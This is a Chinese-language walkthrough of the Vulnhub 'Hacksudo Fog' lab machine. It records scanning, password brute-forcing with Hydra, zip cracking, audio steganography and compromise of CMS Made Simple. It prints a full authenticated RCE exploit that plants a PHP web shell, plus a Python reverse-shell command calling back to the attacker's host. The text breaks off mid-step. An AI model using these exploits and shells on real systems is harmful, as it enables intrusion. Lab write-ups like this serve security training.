Vulnhub之Hacksudo Fog靶机详细测试过程（不同的方法）

Hacksudo Fog

识别目标主机IP地址

1. (kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
4.                                                                                                                            
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                           
10. 192.168.56.100  08:00:27:c9:cb:54      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.254  08:00:27:6f:3c:95      1      60  PCS Systemtechnik GmbH      

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-25 06:34 EDT
4. Nmap scan report for inplainsight (192.168.56.254)
5. Host is up (0.00017s latency).
6. Not shown: 65524 closed tcp ports (reset)
7. PORT      STATE SERVICE  VERSION
8. 21/tcp    open  ftp      Pure-FTPd
9. 22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
10. | ssh-hostkey:
11. |   2048 62ce1b7d4e240f8ac1c9eac41e21a7f3 (RSA)
12. |   256 92045a0a8662b3ba00f3826ac98dae6d (ECDSA)
13. |_  256 74c57c9f8d06ee0c545e65b230429849 (ED25519)
14. 80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
15. |_http-title: Hacksudo FOG
16. |_http-server-header: Apache/2.4.38 (Debian)
17. 111/tcp   open  rpcbind  2-4 (RPC #100000)
18. | rpcinfo:
19. |   program version    port/proto  service
20. |   100000  2,3,4        111/tcp   rpcbind
21. |   100000  2,3,4        111/udp   rpcbind
22. |   100000  3,4          111/tcp6  rpcbind
23. |   100000  3,4          111/udp6  rpcbind
24. |   100003  3           2049/udp   nfs
25. |   100003  3           2049/udp6  nfs
26. |   100003  3,4         2049/tcp   nfs
27. |   100003  3,4         2049/tcp6  nfs
28. |   100005  1,2,3      34008/udp6  mountd
29. |   100005  1,2,3      42789/tcp6  mountd
30. |   100005  1,2,3      44689/tcp   mountd
31. |   100005  1,2,3      54872/udp   mountd
32. |   100021  1,3,4      35042/udp6  nlockmgr
33. |   100021  1,3,4      36081/tcp6  nlockmgr
34. |   100021  1,3,4      39467/tcp   nlockmgr
35. |   100021  1,3,4      57221/udp   nlockmgr
36. |   100227  3           2049/tcp   nfs_acl
37. |   100227  3           2049/tcp6  nfs_acl
38. |   100227  3           2049/udp   nfs_acl
39. |_  100227  3           2049/udp6  nfs_acl
40. 443/tcp   open  http     Apache httpd 2.4.38
41. |_http-server-header: Apache/2.4.38 (Debian)
42. |_http-title: Hacksudo FOG
43. 2049/tcp  open  nfs_acl  3 (RPC #100227)
44. 3306/tcp  open  mysql    MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
45. | mysql-info:
46. |   Protocol: 10
47. |   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
48. |   Thread ID: 90
49. |   Capabilities flags: 63486
50. |   Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, Speaks41ProtocolOld, SupportsTransactions, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSigpipes, FoundRows, InteractiveClient, ODBCClient, ConnectWithDatabase, SupportsCompression, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
51. |   Status: Autocommit
52. |   Salt: N+*0T4IO5V4>zm7dvD0`
53. |_  Auth Plugin Name: mysql_native_password
54. 37535/tcp open  mountd   1-3 (RPC #100005)
55. 39467/tcp open  nlockmgr 1-4 (RPC #100021)
56. 44689/tcp open  mountd   1-3 (RPC #100005)
57. 53383/tcp open  mountd   1-3 (RPC #100005)
58. MAC Address: 08:00:27:6F:3C:95 (Oracle VirtualBox virtual NIC)
59. Service Info: Host: hacksudo.hacksudo; OS: Linux; CPE: cpe:/o:linux:linux_kernel
61. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
62. Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds

复制代码

获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ ftp 192.168.56.254
3. Connected to 192.168.56.254.
4. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
5. 220-You are user number 1 of 50 allowed.
6. 220-Local time is now 06:36. Server port: 21.
7. 220-This is a private system - No anonymous login
8. 220-IPv6 connections are also welcome on this server.
9. 220 You will be disconnected after 15 minutes of inactivity.
10. Name (192.168.56.254:kali): anonymous
11. 331 User anonymous OK. Password required
12. Password:
13. 530 Login authentication failed
14. ftp: Login failed
15. ftp> quit
16. 221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
17. 221 Logout.
18.                                                                                                                              
19. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
20. └─$ searchsploit Pure-FTPd                                    
21. ------------------------------------------------------------------------------------------- ---------------------------------
22. Exploit Title                                                                             |  Path
23. ------------------------------------------------------------------------------------------- ---------------------------------
24. Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit)  | linux/remote/34862.rb
25. Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC)         | linux/dos/20479.pl
26. Pure-FTPd 1.0.48 - Remote Denial of Service                                                | multiple/dos/49105.py
27. ------------------------------------------------------------------------------------------- ---------------------------------
28. Shellcodes: No Results

复制代码

• FTP服务为Pure-FTPd, 版本未知
  
• 不允许匿名访问
  
• 可能存在可以利用的漏洞
  

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ mysql -uroot -p -h 192.168.56.254     
3. Enter password:
4. ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)

复制代码

经简单尝试，mysql不存在弱口令漏洞。

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ showmount -e 192.168.56.254
3. Export list for 192.168.56.254:

复制代码

虽然目标主机配置了NFS共享，但是没有得到共享目录名称。
访问80端口，页面中有链接index1.html

1. ──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ curl http://192.168.56.254/index1.html                             
3. <html>
4. <title>hacksudo-fogTEAM
5. </title>
6. <body >
7. <center><h1><font color=white>Hacksudo:FOG-TEAM</font></h1></center>
8. <img src="https://www.cnblogs.com/fog.jpg" alt="Fog Project" width="1300" height="600"> </body>
9. /fog/index.php]
10. /.html                (Status: 403) [Size: 279]
11. /index.html           (Status: 200) [Size: 853]
12. /index1.html          (Status: 200) [Size: 329]
13. /cms                  (Status: 301) [Size: 314] [--> http://192.168.56.254/cms/]
14. /dict.txt             (Status: 200) [Size: 1798]
15. /fog                  (Status: 301) [Size: 314] [--> http://192.168.56.254/fog/]
16. /.html                (Status: 403) [Size: 279]
17. /.php                 (Status: 403) [Size: 279]

复制代码

gobuster工具扫描出文件dict.txt，以及目录/fog，但/fog没啥用。

1. ──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ wget http://192.168.56.254/dict.txt
3. --2023-04-25 06:55:23--  http://192.168.56.254/dict.txt
4. Connecting to 192.168.56.254:80... connected.
5. HTTP request sent, awaiting response... 200 OK
6. Length: 1798 (1.8K) [text/plain]
7. Saving to: ‘dict.txt’
9. dict.txt                        100%[=====================================================>]   1.76K  --.-KB/s    in 0s      
11. 2023-04-25 06:55:23 (89.6 MB/s) - ‘dict.txt’ saved [1798/1798]

复制代码

很明显dict.txt是字典文件。
先看下这个字典文件是否可以用来破解ssh,用户名为hacksudo（从页面代码的注释知：作者名为hacksudo)

1. ─(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ hydra -l hacksudo -P dict.txt ssh://192.168.56.254      

复制代码

但是破解没有成功。
目录扫描/cms的下级目录，可知存在/admin,为用户登录页面，接下里用Hydra破解一下用户登录

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ hydra -l hacksudo -P dict.txt -f 192.168.56.254 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"
3. Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
5. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-25 07:14:40
6. [DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
7. [DATA] attacking http-post-form://192.168.56.254:80/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect
8. 1 of 1 target completed, 0 valid password found
9. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-25 07:14:44
10.                                                                                                                               
11. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
12. └─$ hydra -l admin -P dict.txt -f 192.168.56.254 http-post-form "/cms/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:F=incorrect"

复制代码

但是都没有破解出来。
怎么把ftp服务忘了，试一下：

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ hydra -l hacksudo -P dict.txt ftp://192.168.56.254
3. Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
5. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-25 07:17:07
6. [DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
7. [DATA] attacking ftp://192.168.56.254:21/
8. [21][ftp] host: 192.168.56.254   login: hacksudo   password: hackme

复制代码

成功得到ftp的用户名和密码。

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ ftp 192.168.56.254
3. Connected to 192.168.56.254.
4. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
5. 220-You are user number 1 of 50 allowed.
6. 220-Local time is now 07:17. Server port: 21.
7. 220-This is a private system - No anonymous login
8. 220-IPv6 connections are also welcome on this server.
9. 220 You will be disconnected after 15 minutes of inactivity.
10. Name (192.168.56.254:kali): hacksudo
11. 331 User hacksudo OK. Password required
12. Password:
13. 230 OK. Current directory is /
14. Remote system type is UNIX.
15. Using binary mode to transfer files.
16. ftp> ls -alh
17. 229 Extended Passive mode OK (|||62242|)
18. 150 Accepted data connection
19. drwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 .
20. drwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 ..
21. -rw-r--r--    1 33         33                389 May  7  2021 flag1.txt
22. drwxr-xr-x    2 0          0                4096 May  6  2021 hacksudo_ISRO_bak
23. 226-Options: -a -l
24. 226 4 matches total
25. ftp> get flag1.txt
26. local: flag1.txt remote: flag1.txt
27. 229 Extended Passive mode OK (|||25989|)
28. 150 Accepted data connection
29. 100% |*********************************************************************************|   389      734.78 KiB/s    00:00 ETA
30. 226-File successfully transferred
31. 226 0.001 seconds (measured here), 0.66 Mbytes per second
32. 389 bytes received in 00:00 (317.62 KiB/s)
33. ftp> cd hacksudo_ISRO_bak
34. 250 OK. Current directory is /hacksudo_ISRO_bak
35. ftp> ls -alh
36. 229 Extended Passive mode OK (|||51758|)
37. 150 Accepted data connection
38. drwxr-xr-x    2 0          0                4096 May  6  2021 .
39. drwxr-xr-x    3 1002       ftpgroup         4096 May  7  2021 ..
40. -rw-r--r--    1 0          0                  63 May  5  2021 authors.txt
41. -rw-r--r--    1 0          0                   0 May  6  2021 installfog
42. -rw-r--r--    1 0          0             1573833 May  6  2021 secr3tSteg.zip
43. 226-Options: -a -l
44. 226 5 matches total
45. ftp> get authors.txt
46. local: authors.txt remote: authors.txt
47. 229 Extended Passive mode OK (|||6620|)
48. 150 Accepted data connection
49. 100% |*********************************************************************************|    63       90.74 KiB/s    00:00 ETA
50. 226-File successfully transferred
51. 226 0.001 seconds (measured here), 86.65 Kbytes per second
52. 63 bytes received in 00:00 (78.77 KiB/s)
53. ftp> get installfog
54. local: installfog remote: installfog
55. 229 Extended Passive mode OK (|||38715|)
56. 150 Accepted data connection
57.      0        0.00 KiB/s
58. 226 File successfully transferred
59. ftp> get secr3tSteg.zip
60. local: secr3tSteg.zip remote: secr3tSteg.zip
61. 229 Extended Passive mode OK (|||61257|)
62. 150-Accepted data connection
63. 150-The computer is your friend. Trust the computer
64. 150 1536.9 kbytes to download
65. 100% |*********************************************************************************|  1536 KiB  136.22 MiB/s    00:00 ETA
66. 226-File successfully transferred
67. 226 0.010 seconds (measured here), 150.32 Mbytes per second
68. 1573833 bytes received in 00:00 (132.86 MiB/s)

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ cat flag1.txt
3. great you done step 1
4. ___ ___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  
5. / __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
6. | (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
7. \___\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
8.                  |___/                                               
10. www.hacksudo.com

复制代码

得到了第1个flag

1. ──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ zip2john secr3tSteg.zip > hash
3. ver 2.0 efh 5455 efh 7875 secr3tSteg.zip/hacksudoSTEGNO.wav PKZIP Encr: TS_chk, cmplen=1573432, decmplen=1965596, crc=8B4A9445 ts=9A86 cs=9a86 type=8
4. ver 1.0 efh 5455 efh 7875 ** 2b ** secr3tSteg.zip/secr3t.txt PKZIP Encr: TS_chk, cmplen=35, decmplen=23, crc=DD73D9B0 ts=9AB0 cs=9ab0 type=0
5. NOTE: It is assumed that all files in each archive have the same password.
6. If that is not the case, the hash may be uncrackable. To avoid this, use
7. option -o to pick a file at a time.
8.                                                                                                                               
9. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
10. └─$ ls -alh
11. total 2.6M
12. drwxr-xr-x   3 kali kali 4.0K Apr 25 07:19 .
13. drwxr-xr-x 116 kali kali 4.0K Apr 25 06:33 ..
14. -rw-r--r--   1 kali kali   63 May  5  2021 authors.txt
15. -rw-r--r--   1 kali kali 1.8K May  8  2021 dict.txt
16. -rw-r--r--   1 kali kali  389 May  7  2021 flag1.txt
17. -rw-r--r--   1 kali kali  20K Nov 27  2020 https://www.cnblogs.com/fog.jpg
18. -rw-r--r--   1 kali kali  294 Apr 25 07:19 hash
19. -rw-r--r--   1 kali kali    0 May  6  2021 installfog
20. -rw-r--r--   1 root root 2.9K Apr 25 06:34 nmap_full_scan
21. -rw-r--r--   1 kali kali 1.6M May  6  2021 secr3tSteg.zip
22. -rw-r--r--   1 kali kali 990K May 11  2021 smoke.mp4
23. drwxr-xr-x   3 kali kali 4.0K Apr 25 06:46 SoundStegno
24.                                                                                                                               
25. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
26. └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash        
27. Using default input encoding: UTF-8
28. Loaded 1 password hash (PKZIP [32/64])
29. No password hashes left to crack (see FAQ)
30.                                                                                                                               
31. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
32. └─$ john --show hash                                    
33. secr3tSteg.zip:fooled::secr3tSteg.zip:secr3t.txt, hacksudoSTEGNO.wav:secr3tSteg.zip
35. 1 password hash cracked, 0 left

复制代码

利用john工具破解得到了压缩文档的加密密码
解压缩得到了音频文件hacksudoSTEGNO.wav，此时就可以用到作者最开始所给出的提示

1. ──(kali㉿kali)-[~/Vulnhub/HacksudoFog/SoundStegno]
2. └─$ python ExWave.py -f ../hacksudoSTEGNO.wav
3. Your Secret Message is: Shift by 3
4. ABCDEFGHIJKLMNOPQRSTUVWXYZ
5. DEFGHIJKLMNOPQRSTUVWXYZABC
6. zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR

复制代码

用网站解密：

1. https://www.dcode.fr/shift-cipher

复制代码

1. wwww.localhost/fog Username=fog:password=hacksudoISRO

复制代码

成功登录/cms/admin

1. ──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ searchsploit -m php/webapps/44976.py
3.   Exploit: CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution
4.       URL: https://www.exploit-db.com/exploits/44976
5.      Path: /usr/share/exploitdb/exploits/php/webapps/44976.py
6.     Codes: CVE-2018-1000094
7. Verified: True
8. File Type: Python script, ASCII text executable
9. Copied to: /home/kali/Vulnhub/HacksudoFog/44976.py

复制代码

需要根据靶机情况修改上述代码，包括base_url, username, password, csrf_param等

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ cat 44976.py                                                      
3. # Exploit Title: CMS Made Simple 2.2.5 authenticated Remote Code Execution
4. # Date: 3rd of July, 2018
5. # Exploit Author: Mustafa Hasan (@strukt93)
6. # Vendor Homepage: http://www.cmsmadesimple.org/
7. # Software Link: http://www.cmsmadesimple.org/downloads/cmsms/
8. # Version: 2.2.5
9. # CVE: CVE-2018-1000094
11. import requests
12. import base64
14. base_url = "http://192.168.56.254/cms/admin"
15. upload_dir = "/uploads"
16. upload_url = base_url.split('/admin')[0] + upload_dir
17. username = "fog"
18. password = "hacksudoISRO"
20. csrf_param = "_sk_"
21. txt_filename = 'cmsmsrce.txt'
22. php_filename = 'shell.php'
23. payload = "<?php system($_GET['cmd']);?>"
25. def parse_csrf_token(location):
26.     return location.split(csrf_param + "=")[1]
28. def authenticate():
29.     page = "/login.php"
30.     url = base_url + page
31.     data = {
32.         "username": username,
33.         "password": password,
34.         "loginsubmit": "Submit"
35.     }
36.     response  = requests.post(url, data=data, allow_redirects=False)
37.     status_code = response.status_code
38.     if status_code == 302:
39.         print "[+] Authenticated successfully with the supplied credentials"
40.         return response.cookies, parse_csrf_token(response.headers['Location'])
41.     print "[-] Authentication failed"
42.     return None, None
44. def upload_txt(cookies, csrf_token):
45.     mact = "FileManager,m1_,upload,0"
46.     page = "/moduleinterface.php"
47.     url = base_url + page
48.     data = {
49.         "mact": mact,
50.         csrf_param: csrf_token,
51.         "disable_buffer": 1
52.     }
53.     txt = {
54.         'm1_files[]': (txt_filename, payload)
55.     }
56.     print "[*] Attempting to upload {}...".format(txt_filename)
57.     response = requests.post(url, data=data, files=txt, cookies=cookies)
58.     status_code = response.status_code
59.     if status_code == 200:
60.         print "[+] Successfully uploaded {}".format(txt_filename)
61.         return True
62.     print "[-] An error occurred while uploading {}".format(txt_filename)
63.     return None
65. def copy_to_php(cookies, csrf_token):
66.     mact = "FileManager,m1_,fileaction,0"
67.     page = "/moduleinterface.php"
68.     url = base_url + page
69.     b64 = base64.b64encode(txt_filename)
70.     serialized = 'a:1:{{i:0;s:{}:"{}";}}'.format(len(b64), b64)
71.     data = {
72.         "mact": mact,
73.         csrf_param: csrf_token,
74.         "m1_fileactioncopy": "",
75.         "m1_path": upload_dir,
76.         "m1_selall": serialized,
77.         "m1_destdir": "/",
78.         "m1_destname": php_filename,
79.         "m1_submit": "Copy"
80.     }
81.     print "[*] Attempting to copy {} to {}...".format(txt_filename, php_filename)
82.     response = requests.post(url, data=data, cookies=cookies, allow_redirects=False)
83.     status_code = response.status_code
84.     if status_code == 302:
85.         if response.headers['Location'].endswith('copysuccess'):
86.             print "[+] File copied successfully"
87.             return True
88.     print "[-] An error occurred while copying, maybe {} already exists".format(php_filename)
89.     return None
91. def quit():
92.     print "[-] Exploit failed"
93.     exit()
95. def run():
96.     cookies,csrf_token = authenticate()
97.     if not cookies:
98.         quit()
99.     if not upload_txt(cookies, csrf_token):
100.         quit()
101.     if not copy_to_php(cookies, csrf_token):
102.         quit()
103.     print "[+] Exploit succeeded, shell can be found at: {}".format(upload_url + '/' + php_filename)
105. run()

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ python2 44976.py
3. [+] Authenticated successfully with the supplied credentials
4. [*] Attempting to upload cmsmsrce.txt...
5. [+] Successfully uploaded cmsmsrce.txt
6. [*] Attempting to copy cmsmsrce.txt to shell.php...
7. [+] File copied successfully
8. [+] Exploit succeeded, shell can be found at: http://192.168.56.254/cms/uploads/shell.php

复制代码

成功执行

1. ┌──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ curl http://192.168.56.254/cms/uploads/shell.php?cmd=id
3. uid=33(www-data) gid=33(www-data) groups=33(www-data)

复制代码

下一步是要得到shell

1. http://192.168.56.254/cms/uploads/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.206%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

复制代码

在Kali Linux上成功得到了目标主机反弹回来的shell

1. ──(kali㉿kali)-[~/Vulnhub/HacksudoFog]
2. └─$ sudo nc -nlvp 5555                                         
3. [sudo] password for kali:
4. listening on [any] 5555 ...
5. connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 44348
6. /bin/sh: 0: can't access tty; job control turned off
7. $ python -c 'import pty;pty.spawn("/bin/bash")'
8. www-data@hacksudo:~/html/cms/uploads$ cd /home
9. cd /home
10. www-data@hacksudo:/home$ ls -alh
11. ls -alh
12. total 24K
13. drwxr-xr-x  6 root root 4.0K May  8  2021 .
14. drwxr-xr-x 20 root root 4.0K May  9  2021 ..
15. drwxr-xr-x  3 root root 4.0K May  7  2021 backups
16. drwxr-xr-x  2 root root 4.0K May  8  2021 fogDBbackups
17. drwxr-x---  4 1001 1001 4.0K May  6  2021 fogproject
18. drwxr-x---  5 isro isro 4.0K May 13  2021 isro

复制代码

1. www-data@hacksudo:~$  cat flag2.txt
2. cat flag2.txt
3. you successfully crack web and got shell access!!!
4.                                 _         _       _   _            
5.   ___ ___  _ __   __ _ _ __ __ _| |_ _   _| | __ _| |_(_) ___  _ __  
6. / __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
7. | (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
8. \___\___/|_| |_|\__, |_|  \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
9. step 2 done.
10.      _               ____  
11. ___| |_ ___ _ __   |___ \
12. / __| __/ _ \ '_ \    __) |
13. \__ \ ||  __/ |_) |  / __/
14. |___/\__\___| .__/  |_____|
15.             |_|            

复制代码

得到了第2个flag.
[code]www-data@hacksudo:~/html/cms$ cat config.phpcat config.php